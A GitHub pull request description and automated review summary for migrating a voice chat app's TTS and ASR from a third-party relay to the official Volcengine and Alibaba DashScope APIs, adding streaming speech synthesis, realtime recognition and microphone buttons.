
feat: migrate TTS providers to backend direct routing #36

Open
Kiritogu wants to merge 13 commits into datawhalechina:dev from Kiritogu:fix/tts-voice-flow

@Kiritogu commented Mar 1, 2026

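Summary

Migrates the TTS and ASR modules from the third-party relay service (unspeech) to the official Volcengine and Alibaba Cloud DashScope APIs, and adds incremental streaming TTS, realtime ASR over WebSocket, and microphone interaction.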

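Problem

  • TTS synthesis depends on the third-party relay unspeech.hyp3r.link, which adds latency and a single point of failure
  • ASR supports only batch transcription; there is no realtime streaming speech recognition
  • The frontend has no microphone input button, so voice interaction is not possible directly in the chat UI
  • During LLM streaming output, TTS has to wait for the complete reply, which makes responses feel slow
  • The speech provider list contains several placeholder entries that were never actually integrated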

Related Issue / PR:

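Solution

Backend: implements native API calls for Volcengine and Alibaba Cloud separately (Volcengine uses HTTPS + Base64 JSON against openspeech.bytedance.com; Alibaba Cloud uses a three-phase WebSocket protocol against dashscope.aliyuncs.com), removing the dependency on the unspeech relay. Adds Alibaba Cloud DashScope realtime ASR (qwen3-asr-flash-realtime) with WebSocket streaming recognition. The Provider Registry gains a local voice catalog (JSON files) and filters compatible voices by model.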
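
To illustrate the "HTTPS + Base64 JSON" shape mentioned above, here is a minimal sketch of turning a JSON response body into raw audio bytes. The field names `data` and `message` and the helper name `decode_audio_from_json` are assumptions made for this example; they are not taken from the PR's code.

```python
import base64
import json


def decode_audio_from_json(body: bytes, field: str = "data") -> bytes:
    """Extract Base64-encoded audio from a JSON body and return raw bytes.

    The field names are assumptions for illustration only.
    """
    payload = json.loads(body)
    if not isinstance(payload, dict):
        raise ValueError("TTS provider error: unexpected response shape")
    encoded = payload.get(field)
    if not isinstance(encoded, str) or not encoded:
        # Surface the provider's message when no audio is present.
        message = payload.get("message") or "no audio in response"
        raise ValueError(f"TTS provider error: {message}")
    # validate=True rejects characters outside the Base64 alphabet.
    return base64.b64decode(encoded, validate=True)
```

Returning the whole decoded buffer at once fits a non-streaming response, since the audio only becomes available after the full JSON body has arrived.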

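Frontend: implements incremental streaming TTS (TtsStreamSegmenter splits text by sentence as LLM tokens arrive and synthesizes each piece immediately) and adds several utility modules to break the logic into smaller pieces. The chat UI and the desktop app gain a microphone button with mute/unmute states. The speech provider list is trimmed to the 4 providers that are actually integrated.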

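Changes

Core changes

Backend TTS direct routing (backend/app/api/tts.py, +675/-191)

  • Adds _forward_volcengine_tts: calls the Volcengine TTS API directly, with Bearer token authentication and Base64 audio decoding
  • Adds _forward_alibaba_tts: talks to Alibaba Cloud CosyVoice over WebSocket (three-phase protocol: run-task → continue-task → finish-task)
  • Removes the Dify/Coze TTS handlers (_stream_dify_tts, _stream_coze_tts) and the old streaming proxy logic
  • Adds structured error extraction and a hint for Volcengine credential errors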
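
The three-phase protocol named in the list above (run-task, continue-task, finish-task) can be sketched as three JSON frames that share one task ID. The frame layout below (`header`/`payload`, `streaming: "duplex"`, `parameters.voice`, `input.text`) is an assumption based on a general understanding of DashScope-style task protocols, and `build_task_frames` is a hypothetical helper, not the PR's implementation.

```python
import json
import uuid
from typing import List


def build_task_frames(model: str, voice: str, text: str) -> List[str]:
    """Build the three text frames for one synthesis task (assumed layout)."""
    task_id = uuid.uuid4().hex  # all three frames must reference the same task

    def frame(action: str, payload: dict) -> str:
        header = {"action": action, "task_id": task_id, "streaming": "duplex"}
        return json.dumps({"header": header, "payload": payload}, ensure_ascii=False)

    return [
        # Phase 1: open the task and declare model and voice.
        frame("run-task", {"model": model, "parameters": {"voice": voice}, "input": {}}),
        # Phase 2: send the text to synthesize.
        frame("continue-task", {"input": {"text": text}}),
        # Phase 3: signal that no more text will follow.
        frame("finish-task", {"input": {}}),
    ]
```

In a real client the frames would be sent in this order over the WebSocket, with audio arriving as binary messages in between; that I/O is deliberately left out here.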

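Backend realtime ASR streaming (backend/app/api/asr.py, +613/-24)

  • Adds Alibaba Cloud DashScope batch transcription (/compatible-mode/v1/chat/completions + input_audio)
  • Adds AliyunRealtimeSession for realtime WebSocket ASR (wss://dashscope.aliyuncs.com/api-ws/v1/realtime)
  • Adds WebSocket disconnect detection and safe cleanup
  • Normalizes model names automatically: realtime streaming forces the -realtime suffix, batch mode strips it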
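Provider Registry (backend/app/services/providers/registry.py, +225/-4)

  • list_voices loads the voice list from the local JSON catalog (LRU-cached)
  • Alibaba Cloud voices are filtered by compatible_models to match the currently selected model
  • Adds credential validation and a model list for Alibaba Cloud NLS ASR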
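
A cached catalog load combined with model filtering, as described in the first two bullets, might look roughly like this. The catalog shape (a JSON array of objects with a `compatible_models` list) and the helper names are assumptions for illustration; the real files may be structured differently.

```python
import json
from functools import lru_cache
from pathlib import Path
from typing import Iterable, List, Optional


@lru_cache(maxsize=8)
def load_voice_catalog(path: str) -> tuple:
    """Read a voice catalog once per path; later calls hit the cache."""
    entries = json.loads(Path(path).read_text(encoding="utf-8"))
    # A tuple keeps callers from appending to the cached value.
    return tuple(entries)


def filter_voices(voices: Iterable[dict], model: Optional[str]) -> List[dict]:
    """Keep voices whose compatible_models contains the selected model."""
    if not model:
        return list(voices)
    return [v for v in voices if model in v.get("compatible_models", [])]
```

Caching on the path string works because the catalog files are static; if they could change at runtime, `load_voice_catalog.cache_clear()` would be needed after an update.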

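Frontend incremental streaming TTS (speech-output.ts + new utility modules)

  • TtsStreamSegmenter: segments streamed LLM tokens at punctuation and special markers
  • runTtsChunkQueue: synthesizes segments sequentially; on failure, falls back to merging the remaining text
  • tts-chunker.ts: supports CJK word segmentation (Intl.Segmenter), preserves decimals, and normalizes ellipses
  • tts-direct-request.ts: builds direct TTS requests and falls back to the legacy format on a 405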
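
The core idea of sentence-level segmentation over a token stream can be sketched as follows. The PR implements this in TypeScript; the sketch below is written in Python purely to illustrate the buffering logic. The class name `StreamSegmenter` and the boundary rule are assumptions, and special-marker handling is omitted.

```python
import re
from typing import List

# CJK and Latin sentence enders. A "." only counts when whitespace follows,
# so "3.5" stays intact and a trailing "." waits for the next token.
_BOUNDARY = re.compile(r"[。!?!?]|\.(?=\s)")


class StreamSegmenter:
    """Buffer streamed tokens and emit complete sentences as they appear."""

    def __init__(self) -> None:
        self._buffer = ""

    def push(self, token: str) -> List[str]:
        self._buffer += token
        chunks: List[str] = []
        start = 0
        for match in _BOUNDARY.finditer(self._buffer):
            sentence = self._buffer[start:match.end()].strip()
            if sentence:
                chunks.append(sentence)
            start = match.end()
        # Keep the unfinished tail for the next push.
        self._buffer = self._buffer[start:]
        return chunks

    def drain(self) -> List[str]:
        """Emit whatever is left once the stream has ended."""
        rest = self._buffer.strip()
        self._buffer = ""
        return [rest] if rest else []
```

Each chunk returned by `push` can be handed to synthesis right away, which is what lets playback start before the full reply has arrived.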

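Frontend ASR enhancements (transcription.ts + new utility modules)

  • Browser speech recognition restarts automatically (shouldAutoRestartBrowserRecognition)
  • AudioWorklet failures fall back automatically to MediaRecorder (decideCaptureFallback)
  • Transcript cleanup: filters out Windows paths that were misrecognized as speech (sanitizeTranscript)
  • Language code normalization: zh → zh-CN; the default follows navigator.language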
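
The language code normalization in the last bullet amounts to a small lookup with a fallback. The sketch below is in Python for illustration only (the PR's version is TypeScript); the function name, the mapping table, and the `en-US` fallback are assumptions.

```python
from typing import Optional

# Short codes expanded to a full locale; other values pass through unchanged.
_SHORT_CODES = {"zh": "zh-CN", "en": "en-US"}


def normalize_language(code: Optional[str], fallback: str = "en-US") -> str:
    """Expand short language codes and fall back when none is given."""
    value = (code or "").strip()
    if not value:
        return fallback
    return _SHORT_CODES.get(value.lower(), value)
```

In the browser, the value passed in would typically come from the saved setting or from `navigator.language`.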

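Frontend UI

  • ChatArea.vue / DesktopChatOverlay.vue: add a microphone button (with mute/unmute visual states)
  • App.vue: wires onTokenLiteral / onTokenSpecial to drive incremental TTS
  • AudioSection.vue: language becomes a dropdown; redundant toggles are removed
  • Tauri windows enable useHttpsScheme to support microphone permission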

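Supporting changes

  • New voice catalog data files: alibaba.json (CosyVoice voices), volcengine.json (Volcengine voices)
  • Trims provider-fallback.ts / provider-options.ts: removes 7 speech providers that were never integrated
  • provider-visibility.ts: the allowlist keeps only the 4 integrated providers
  • provider-fields.ts: hides the baseUrl field automatically when a default baseUrl exists
  • websockets is promoted from a dev dependency to a runtime dependency (pyproject.toml)
  • Config files engines.yaml / providers.yaml are updated to the official API endpoints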

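Notes

  • The .idea/ directory (JetBrains IDE config) is included in the commits; it should be added to .gitignore or removed from the commits
  • CLAUDE.md is committed alongside as a project guide document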

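Breaking changes

  • Dify/Coze TTS handling removed: _stream_dify_tts, _stream_coze_tts, and related functions have been deleted
  • 7 frontend speech provider options removed: OpenAI, ElevenLabs, Microsoft Speech, Index TTS, Comet API, Player2, and others no longer appear in settings
  • Default speech provider changed: from openai-audio-speech to browser-local-audio-speech
  • TTS API return type changed: run_tts_engine now returns Response instead of StreamingResponse (the complete audio buffer is returned)
  • Alibaba Cloud model ID format changed: alibaba/cosyvoice-v1 → cosyvoice-v1 (prefix removed)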
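
For configurations saved before this change, the model ID format change could be absorbed by a one-line normalizer like the sketch below. The function name is hypothetical; only the `alibaba/` prefix rule comes from the list above.

```python
ALIBABA_PREFIX = "alibaba/"


def normalize_alibaba_model(model: str) -> str:
    """Strip the legacy alibaba/ prefix from a stored model ID."""
    name = model.strip()
    if name.startswith(ALIBABA_PREFIX):
        return name[len(ALIBABA_PREFIX):]
    return name
```

Applying it on read, rather than rewriting stored settings, keeps old and new configurations working side by side.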

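Tests

Adds 16 new test files covering the core logic:

Backend tests (6):

  • test_tts_engine_relay.py: Volcengine payload building, Alibaba Cloud model normalization, error extraction
  • test_asr_aliyun_dashscope.py: DashScope URL building, transcript text extraction, model normalization
  • test_provider_voices_tts.py: voice catalog loading and model filtering
  • test_provider_catalog_tts_defaults.py: validation of default TTS provider endpoints
  • test_provider_catalog_aliyun_fields.py: Alibaba Cloud NLS field normalization
  • test_asr_stream_disconnect.py: WebSocket disconnect detection

Frontend tests (10):

  • audio-direct.test.ts: direct request building and legacy format fallback
  • tts-chunker.test.ts: text chunking, CJK, special markers
  • tts-stream-segmenter.test.ts: stream segmentation and drain
  • tts-streaming-runner.test.ts: queue execution, error handling
  • browser-recognition-restart.test.ts: auto-restart logic
  • capture-startup.test.ts: Worklet fallback logic
  • provider-fields.test.ts / provider-visibility.test.ts: field filtering and visibility
  • transcript-filter.test.ts / transcription-language.test.ts: transcript cleanup and language normalization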

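Self-test

  • Backend unit tests pass (pytest backend/tests/test_tts_*.py backend/tests/test_asr_*.py backend/tests/test_provider_*.py)
  • Frontend unit tests pass
  • Started backend + frontend locally and verified that Volcengine TTS synthesis works
  • Verified locally that Alibaba Cloud CosyVoice TTS synthesis works
  • Verified locally that Alibaba Cloud DashScope realtime ASR streaming recognition works
  • The microphone button in the chat UI works (Web + Tauri)
  • Incremental TTS playback works during streamed LLM replies
  • pnpm -C frontend --filter @whalewhisper/web build succeeds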

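Checklist

  • Code follows the project conventions
  • Self-review completed
  • Local tests pass
  • Documentation updated (if needed)
  • .idea/ directory removed from the commits or added to .gitignore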

Auto-generated by Claude AI


@github-actions bot added the labels area/backend, area/frontend, needs-review, size/XL, and type/feature on Mar 1, 2026

Review Summary by Qodo

Migrate TTS/ASR providers to backend direct routing with incremental streaming and voice catalogs

✨ Enhancement 🧪 Tests


Walkthroughs

Description
• Migrate TTS providers to backend direct routing with official provider endpoints for Volcengine
  and Alibaba, replacing unspeech relay
• Implement incremental TTS streaming for assistant responses with TtsStreamSegmenter and
  chunk-based playback
• Add microphone input to chat interface and desktop overlay with source-aware listening context
  tracking
• Implement Alibaba Bailian DashScope ASR integration with realtime WebSocket streaming support
• Add local static voice catalogs for Volcengine and Alibaba providers with backend voice listing
  API
• Normalize Alibaba model IDs by removing alibaba/ prefix in frontend and backend processing
• Prune frontend speech providers to Volcengine, Alibaba, and local audio only with visibility
  filtering
• Add comprehensive test coverage for TTS engine relay, ASR integration, provider voice catalogs,
  and field normalization
• Implement transcript sanitization, language normalization, and browser recognition auto-restart
  logic
• Add provider field filtering to hide redundant baseUrl configuration when defaults exist
• Update default speech provider from OpenAI to browser-local-audio-speech
• Add IDE configuration files and comprehensive development guide (CLAUDE.md)
Diagram
flowchart LR
  FE["Frontend<br/>Chat/Settings UI"]
  BE["Backend<br/>API Router"]
  VC["Volcengine<br/>Official API"]
  AC["Alibaba<br/>DashScope API"]
  
  FE -->|"/api/tts/engines"| BE
  FE -->|"/api/providers/voices"| BE
  FE -->|"/api/asr/stream"| BE
  
  BE -->|"Direct TTS"| VC
  BE -->|"Direct TTS/ASR"| AC
  
  FE -->|"Incremental text"| STREAM["TTS Stream<br/>Segmenter"]
  STREAM -->|"Chunks"| QUEUE["Chunk Queue<br/>Runner"]
  QUEUE -->|"Sequential requests"| BE


File Changes

1. frontend/packages/stage-settings-ui/src/components/AudioSection.vue ✨ Enhancement +96/-102

Refactor audio settings UI for source-aware listening

• Refactored microphone input handling to support multiple listening sources (settings-test and
 chat-input) with source tracking
• Replaced manual voice selection UI with language dropdown selector for transcription
• Removed voiceId and refreshVoices from speech output state management
• Updated listening state to use listeningSource for context-aware UI rendering
• Simplified transcription test UI with improved feedback display

frontend/packages/stage-settings-ui/src/components/AudioSection.vue


2. frontend/apps/web/src/components/widgets/ChatArea.vue ✨ Enhancement +109/-34

Add microphone input button to chat interface

• Added microphone button to chat input area with visual feedback for active listening
• Integrated useTranscriptionStore to manage chat-specific transcription state
• Implemented toggleChatMic function to start/stop listening with chat-input source
• Added error display for transcription errors in chat context

frontend/apps/web/src/components/widgets/ChatArea.vue


3. frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue ✨ Enhancement +85/-18

Add microphone input to desktop chat overlay

• Added microphone button to desktop chat overlay with active state styling
• Integrated transcription store for managing listening state and errors
• Implemented toggleChatMic function for chat-input source listening
• Added visual feedback and error display for transcription in chat

frontend/apps/desktop-tauri/renderer/src/components/DesktopChatOverlay.vue


4. frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue ✨ Enhancement +17/-0

Add microphone cleanup for settings window lifecycle

• Added cleanup for settings-test microphone sessions on window close
• Implemented visibility change listener to stop test microphone when window hidden
• Added stopSettingsTestMic function to manage listening source cleanup

frontend/apps/desktop-tauri/renderer/src/SettingsApp.vue


5. frontend/apps/web/src/components/settings/SettingsDialog.vue ✨ Enhancement +5/-0

Add microphone cleanup for settings dialog

• Added cleanup to stop settings-test listening when settings dialog closes
• Integrated useTranscriptionStore for managing test microphone state

frontend/apps/web/src/components/settings/SettingsDialog.vue


6. frontend/apps/desktop-tauri/renderer/src/ChatApp.vue ✨ Enhancement +8/-0

Integrate speech output for assistant messages

• Added useSpeechOutputStore integration for automatic speech synthesis
• Implemented listener for assistant final messages to trigger speech output
• Added chatStore.connect() call on mount

frontend/apps/desktop-tauri/renderer/src/ChatApp.vue


7. frontend/apps/web/src/App.vue ✨ Enhancement +7/-1

Add incremental speech synthesis for assistant responses

• Added token literal listener to push assistant text to speech output incrementally
• Updated special token handling to include speech output processing
• Changed final message handling to use endAssistantStream for streaming TTS

frontend/apps/web/src/App.vue


8. frontend/packages/app-settings/src/sections/ModelSection.vue ✨ Enhancement +9/-3

Reset voice selection on model change

• Added logic to reset voice field when speech model changes
• Implemented provider refresh after model selection change

frontend/packages/app-settings/src/sections/ModelSection.vue


9. frontend/packages/app-settings/src/sections/AudioSection.vue ✨ Enhancement +6/-1

Add microphone cleanup on unmount

• Added cleanup to stop settings-test listening on component unmount

frontend/packages/app-settings/src/sections/AudioSection.vue


10. frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue ✨ Enhancement +7/-0

Add voice field empty state placeholder

• Added placeholder text for voice field when no compatible voices available

frontend/packages/stage-settings-ui/src/components/ProviderPanel.vue


11. frontend/packages/app-core/src/stores/speech-output.ts ✨ Enhancement +404/-87

Implement incremental TTS streaming for assistant

• Removed voiceId local storage and replaced with provider config voice
• Implemented incremental streaming support with TtsStreamSegmenter for assistant responses
• Added pushAssistantLiteral, pushAssistantSpecial, and endAssistantStream methods for
 streaming TTS
• Refactored TTS request handling to use requestTtsDirect with retry logic
• Added chunk-based playback with fallback to merged remainder on failure

frontend/packages/app-core/src/stores/speech-output.ts


12. frontend/packages/app-core/src/stores/transcription.ts ✨ Enhancement +210/-60

Add listening source tracking and language normalization

• Added listeningSource tracking to distinguish between settings-test and chat-input contexts
• Implemented browser recognition auto-restart logic with error recovery
• Added language normalization and initial language resolution based on navigator
• Refactored listening start/stop to accept options for source and auto-send configuration
• Added transcript sanitization to filter invalid paths and normalize text

frontend/packages/app-core/src/stores/transcription.ts


13. frontend/packages/app-core/src/data/provider-fallback.ts ⚙️ Configuration changes +12/-232

Prune unsupported speech providers and update endpoints

• Removed OpenAI and OpenAI-compatible speech providers from fallback catalog
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine default base URL from unspeech relay to official endpoint
• Updated Alibaba Cloud default base URL and model IDs (removed alibaba/ prefix)
• Updated Aliyun NLS transcription provider metadata and description

frontend/packages/app-core/src/data/provider-fallback.ts


14. frontend/packages/app-core/src/utils/tts-direct-request.ts ✨ Enhancement +262/-0

Add TTS direct request builder utility

• New utility for building backend relay TTS requests with engine-specific config normalization
• Implements legacy fallback request building for compatibility
• Handles Alibaba model ID normalization and Volcengine appId resolution
• Supports legacy unspeech endpoint migration to official provider endpoints

frontend/packages/app-core/src/utils/tts-direct-request.ts


15. frontend/packages/app-core/src/utils/tts-chunker.ts ✨ Enhancement +243/-0

Add TTS text chunking utility

• New utility for intelligent text chunking optimized for TTS streaming
• Implements punctuation-aware segmentation with word count balancing
• Supports special markers for flush and special token handling
• Provides sanitization to remove special markers from output chunks

frontend/packages/app-core/src/utils/tts-chunker.ts


16. frontend/packages/app-core/src/data/provider-options.ts ⚙️ Configuration changes +7/-104

Update provider options for backend relay

• Removed OpenAI and OpenAI-compatible speech provider options
• Removed ElevenLabs, Microsoft, Index TTS, Comet API, and Player2 speech providers
• Updated Volcengine and Alibaba Cloud provider configurations with new endpoints
• Updated Aliyun NLS transcription provider metadata

frontend/packages/app-core/src/data/provider-options.ts


17. frontend/packages/app-core/src/services/audio-direct.test.ts 🧪 Tests +172/-0

Add tests for TTS direct request builder

• New test suite for TTS direct request building and legacy fallback
• Tests engine support detection, request building, URL normalization
• Validates Alibaba model ID normalization and legacy request conversion

frontend/packages/app-core/src/services/audio-direct.test.ts


18. frontend/packages/app-core/src/services/audio.ts ✨ Enhancement +100/-13

Implement backend relay TTS with legacy fallback

• Refactored requestTts to use requestTtsDirect with backend relay support
• Added fallback to legacy /api/tts/synthesize endpoint on 405 response
• Implemented JSON response parsing for base64-encoded audio payloads
• Added error handling with status code and detail information

frontend/packages/app-core/src/services/audio.ts


19. frontend/packages/app-core/src/utils/transcript-filter.ts ✨ Enhancement +17/-0

Add transcript sanitization utility

• New utility to sanitize transcripts by filtering invalid Windows absolute paths
• Prevents file paths from being treated as transcribed text

frontend/packages/app-core/src/utils/transcript-filter.ts
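
The path filter described for this file can be sketched as below. This is a Python illustration of the idea only (the PR's utility is TypeScript), and both the function name and the exact pattern are assumptions: a transcript that consists solely of a Windows absolute path is dropped, anything else is trimmed and kept.

```python
import re

# Drive letter, colon, a slash or backslash, then only characters that are
# legal in Windows paths. The pattern is anchored so it matches whole strings.
_WINDOWS_PATH = re.compile(r'^[A-Za-z]:[\\/][^:*?"<>|\r\n]*$')


def sanitize_transcript(text: str) -> str:
    """Return an empty string for path-only transcripts, else trimmed text."""
    cleaned = text.strip()
    if _WINDOWS_PATH.match(cleaned):
        return ""
    return cleaned
```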


20. frontend/packages/app-core/src/stores/providers.ts ✨ Enhancement +63/-5

Provider normalization and visibility filtering for speech providers

• Added imports for filterProviderFields and isVisibleSpeechProviderId utilities
• Implemented normalizeProviderEntry() to normalize Aliyun NLS provider fields
• Implemented filterRemovedSpeechProviders() to filter speech providers by visibility
• Updated effectiveProviders computed to apply normalization and filtering to provider catalogs
• Modified getProviderFields() to use filterProviderFields() for field filtering
• Added queueProviderRefresh() helper function for provider refresh management
• Added watcher for settings store provider IDs to trigger provider refresh on changes
• Updated provider config watcher to use queueProviderRefresh()

frontend/packages/app-core/src/stores/providers.ts


21. frontend/packages/app-core/src/services/providers.ts ✨ Enhancement +33/-58

Migrate voice fetching to backend API endpoint

• Removed unspeech library imports and dependencies
• Replaced local Alibaba voice handling with backend API call to /api/providers/voices
• Simplified listProviderVoices() to use unified backend endpoint for voice fetching
• Added support for both direct backend calls and proxy-based requests
• Removed complex voice filtering and model candidate logic (moved to backend)

frontend/packages/app-core/src/services/providers.ts


22. frontend/packages/app-core/src/utils/tts-streaming-runner.ts ✨ Enhancement +72/-0

TTS chunk queue processing with error recovery

• New utility for processing TTS text chunks with error handling and recovery
• Implements runTtsChunkQueue() to process chunks sequentially with configurable error behavior
• Supports stopOnError option to halt on first failure or continue processing
• Provides TtsChunkQueueError for detailed error context with chunk index and total count
• Distinguishes between abort errors (which are rethrown) and recoverable errors

frontend/packages/app-core/src/utils/tts-streaming-runner.ts
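
The queue behavior summarized above (sequential processing, continue on individual failures, rethrow aborts, optional stop on first error) can be sketched with asyncio. This is a Python illustration rather than the PR's TypeScript; `run_chunk_queue` and `ChunkQueueError` are hypothetical names, and task cancellation stands in for an abort signal.

```python
import asyncio
from typing import Awaitable, Callable, Optional, Sequence


class ChunkQueueError(Exception):
    """Carries the failing chunk's index and the total chunk count."""

    def __init__(self, index: int, total: int, cause: BaseException) -> None:
        super().__init__(f"chunk {index + 1}/{total} failed: {cause}")
        self.index = index
        self.total = total
        self.cause = cause


async def run_chunk_queue(
    chunks: Sequence[str],
    synthesize: Callable[[str], Awaitable[None]],
    stop_on_error: bool = False,
) -> int:
    """Synthesize chunks in order and return how many succeeded."""
    succeeded = 0
    last_error: Optional[ChunkQueueError] = None
    for index, chunk in enumerate(chunks):
        try:
            await synthesize(chunk)
            succeeded += 1
        except asyncio.CancelledError:
            raise  # an abort is never swallowed
        except Exception as exc:
            last_error = ChunkQueueError(index, len(chunks), exc)
            if stop_on_error:
                raise last_error from exc
    # Only surface an error when nothing at all could be synthesized.
    if succeeded == 0 and last_error is not None:
        raise last_error
    return succeeded
```

Continuing past a single failed chunk trades a short gap in speech for keeping the rest of the reply audible.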


23. frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts 🧪 Tests +79/-0

Tests for TTS chunk queue processing

• Test suite for runTtsChunkQueue() function
• Validates chunk processing continuation on individual failures
• Validates error throwing when all chunks fail
• Validates abort error propagation without suppression
• Validates stopOnError option behavior with error context

frontend/packages/app-core/src/utils/tts-streaming-runner.test.ts


24. frontend/packages/app-core/src/utils/provider-fields.ts ✨ Enhancement +23/-0

Provider field filtering based on defaults

• New utility to filter provider configuration fields based on defaults
• Hides baseUrl field when provider has default base URL in provider defaults or field default
• Reduces configuration complexity by hiding redundant fields

frontend/packages/app-core/src/utils/provider-fields.ts


25. frontend/packages/app-core/src/utils/provider-fields.test.ts 🧪 Tests +61/-0

Tests for provider field filtering

• Test suite for filterProviderFields() function
• Validates baseUrl field hiding when provider has default base URL
• Validates baseUrl field hiding when field itself has default value
• Validates baseUrl field retention when no defaults exist

frontend/packages/app-core/src/utils/provider-fields.test.ts


26. frontend/packages/app-core/src/utils/tts-chunker.test.ts 🧪 Tests +51/-0

Tests for TTS text chunking logic

• Test suite for TTS text chunking utilities
• Validates sentence splitting on hard punctuation
• Validates decimal number preservation in chunking
• Validates ellipsis normalization from three dots
• Validates special token and flush instruction handling

frontend/packages/app-core/src/utils/tts-chunker.test.ts


27. frontend/packages/app-core/src/utils/capture-startup.ts ✨ Enhancement +35/-0

Audio capture fallback decision logic

• New utility for audio capture fallback decision logic
• Implements decideCaptureFallback() to choose between media recorder and worklet modes
• Normalizes error messages from various error types
• Provides actionable error information when no fallback is available

frontend/packages/app-core/src/utils/capture-startup.ts


28. frontend/packages/app-core/src/utils/capture-startup.test.ts 🧪 Tests +63/-0

Tests for audio capture fallback logic

• Test suite for audio capture fallback decision logic
• Validates fallback to media recorder when worklet fails
• Validates error return when no fallback available
• Validates error message normalization for non-Error types

frontend/packages/app-core/src/utils/capture-startup.test.ts


29. frontend/packages/app-core/src/utils/tts-stream-segmenter.ts ✨ Enhancement +64/-0

TTS stream segmentation for incremental processing

• New class TtsStreamSegmenter for streaming TTS text segmentation
• Manages incremental text input with special markers for flushing and control
• Emits completed chunks while preserving trailing text for next iteration
• Supports finalization mode for emitting remaining buffered text

frontend/packages/app-core/src/utils/tts-stream-segmenter.ts


30. frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts 🧪 Tests +39/-0

Tests for TTS stream segmentation

• Test suite for TtsStreamSegmenter class
• Validates sentence emission while keeping trailing text
• Validates special marker flushing behavior
• Validates final drain emission of incomplete sentences

frontend/packages/app-core/src/utils/tts-stream-segmenter.test.ts


31. frontend/packages/app-core/src/utils/provider-visibility.ts ✨ Enhancement +14/-0

Speech provider visibility filtering

• New utility defining visible speech provider IDs
• Implements isVisibleSpeechProviderId() to check provider visibility
• Implements filterVisibleSpeechProviders() to filter provider lists
• Restricts visible providers to Volcengine, Alibaba, and local audio providers

frontend/packages/app-core/src/utils/provider-visibility.ts


32. frontend/packages/app-core/src/utils/provider-visibility.test.ts 🧪 Tests +42/-0

Tests for speech provider visibility

• Test suite for speech provider visibility functions
• Validates visibility of configured speech providers
• Validates filtering of unsupported speech provider IDs

frontend/packages/app-core/src/utils/provider-visibility.test.ts


33. frontend/packages/app-core/src/utils/browser-recognition-restart.ts ✨ Enhancement +23/-0

Browser speech recognition restart decision logic

• New utility for browser speech recognition auto-restart logic
• Implements shouldAutoRestartBrowserRecognition() with multiple decision factors
• Prevents restart on manual stop, permission denial, and other fatal errors

frontend/packages/app-core/src/utils/browser-recognition-restart.ts


34. frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts 🧪 Tests +56/-0

Tests for browser recognition restart logic

• Test suite for browser recognition restart logic
• Validates restart on active user session without fatal errors
• Validates no restart after manual stop
• Validates no restart on microphone permission denial

frontend/packages/app-core/src/utils/browser-recognition-restart.test.ts


35. frontend/packages/app-core/src/utils/transcription-language.ts ✨ Enhancement +25/-0

Transcription language normalization utility

• New utility for transcription language normalization
• Implements normalizeTranscriptionLanguage() to standardize language codes
• Implements resolveInitialTranscriptionLanguage() with fallback to English
• Normalizes short codes (zh → zh-CN, en → en-US)

frontend/packages/app-core/src/utils/transcription-language.ts


36. frontend/packages/app-core/src/utils/transcription-language.test.ts 🧪 Tests +40/-0

Tests for transcription language normalization

• Test suite for transcription language normalization
• Validates short language code expansion
• Validates specific locale preservation
• Validates fallback to English when language missing

frontend/packages/app-core/src/utils/transcription-language.test.ts


37. frontend/packages/app-core/src/utils/transcript-filter.test.ts 🧪 Tests +23/-0

Tests for transcript filtering

• Test suite for transcript sanitization
• Validates filtering of Windows absolute file paths
• Validates preservation of natural language transcripts

frontend/packages/app-core/src/utils/transcript-filter.test.ts


38. frontend/packages/app-core/src/stores/settings.ts ⚙️ Configuration changes +1/-1

Update default speech provider to local audio

• Changed default speech provider from openai-audio-speech to browser-local-audio-speech

frontend/packages/app-core/src/stores/settings.ts


39. backend/app/api/tts.py ✨ Enhancement +675/-191

Direct TTS provider routing for Volcengine and Alibaba

• Refactored TTS engine routing to support direct provider endpoints for Volcengine and Alibaba
• Implemented _forward_volcengine_tts() for direct Volcengine API calls with custom payload format
• Implemented _forward_alibaba_tts() for WebSocket-based Alibaba DashScope TTS
• Added comprehensive error extraction and decoration for provider-specific error messages
• Replaced streaming response with direct response for better error handling
• Added helper functions for payload building, model/voice resolution, and parameter parsing
• Removed legacy Dify and Coze TTS streaming implementations

backend/app/api/tts.py


40. backend/app/api/asr.py ✨ Enhancement +613/-24

Alibaba Bailian DashScope ASR integration with realtime support

• Added support for Alibaba Bailian DashScope ASR with realtime WebSocket streaming
• Implemented _forward_aliyun_dashscope_transcription() for non-realtime ASR via chat API
• Implemented realtime ASR session management with AliyunRealtimeSession dataclass
• Added WebSocket connection handling with proper cleanup and error recovery
• Enhanced streaming endpoint to support Alibaba realtime ASR with audio buffering
• Added helper functions for URL building, credential resolution, and event parsing
• Improved WebSocket disconnect handling with fallback error reporting

backend/app/api/asr.py


41. backend/app/services/providers/registry.py ✨ Enhancement +225/-4

Local TTS voice catalogs and Alibaba ASR support

• Added local TTS voice catalog loading for Volcengine and Alibaba providers
• Implemented _load_local_tts_voices() to load voices from JSON files
• Implemented voice parsing for Alibaba and Volcengine formats with model filtering
• Added Alibaba NLS ASR provider validation and model listing
• Implemented model candidate resolution for Alibaba voice filtering
• Added voice description building from language and compatibility metadata

backend/app/services/providers/registry.py


42. backend/tests/test_tts_engine_relay.py 🧪 Tests +188/-0

Tests for TTS engine relay and payload building

• New test suite for TTS engine relay functions
• Tests for TTS input extraction from various formats
• Tests for API key resolution with override precedence
• Tests for Volcengine and Alibaba payload building
• Tests for model normalization and error decoration

backend/tests/test_tts_engine_relay.py


43. backend/tests/test_asr_aliyun_dashscope.py 🧪 Tests +112/-0

Tests for Alibaba DashScope ASR integration

• New test suite for Alibaba DashScope ASR functions
• Tests for URL building and credential resolution
• Tests for realtime WebSocket URL construction
• Tests for ASR text extraction from various response formats
• Tests for model resolution and event parsing

backend/tests/test_asr_aliyun_dashscope.py


44. backend/tests/test_provider_voices_tts.py 🧪 Tests +110/-0

Tests for provider voice catalog listing

• New test suite for provider voice listing
• Tests for local voice catalog loading for Volcengine and Alibaba
• Tests for model-based voice filtering for Alibaba
• Tests for unsupported provider handling

backend/tests/test_provider_voices_tts.py


45. backend/tests/test_provider_catalog_tts_defaults.py 🧪 Tests +43/-0

Tests for TTS provider catalog defaults

• New test suite for TTS provider catalog defaults
• Validates Volcengine uses official endpoint as default base URL
• Validates Alibaba uses DashScope endpoint with correct model defaults
• Validates model field options in provider catalog

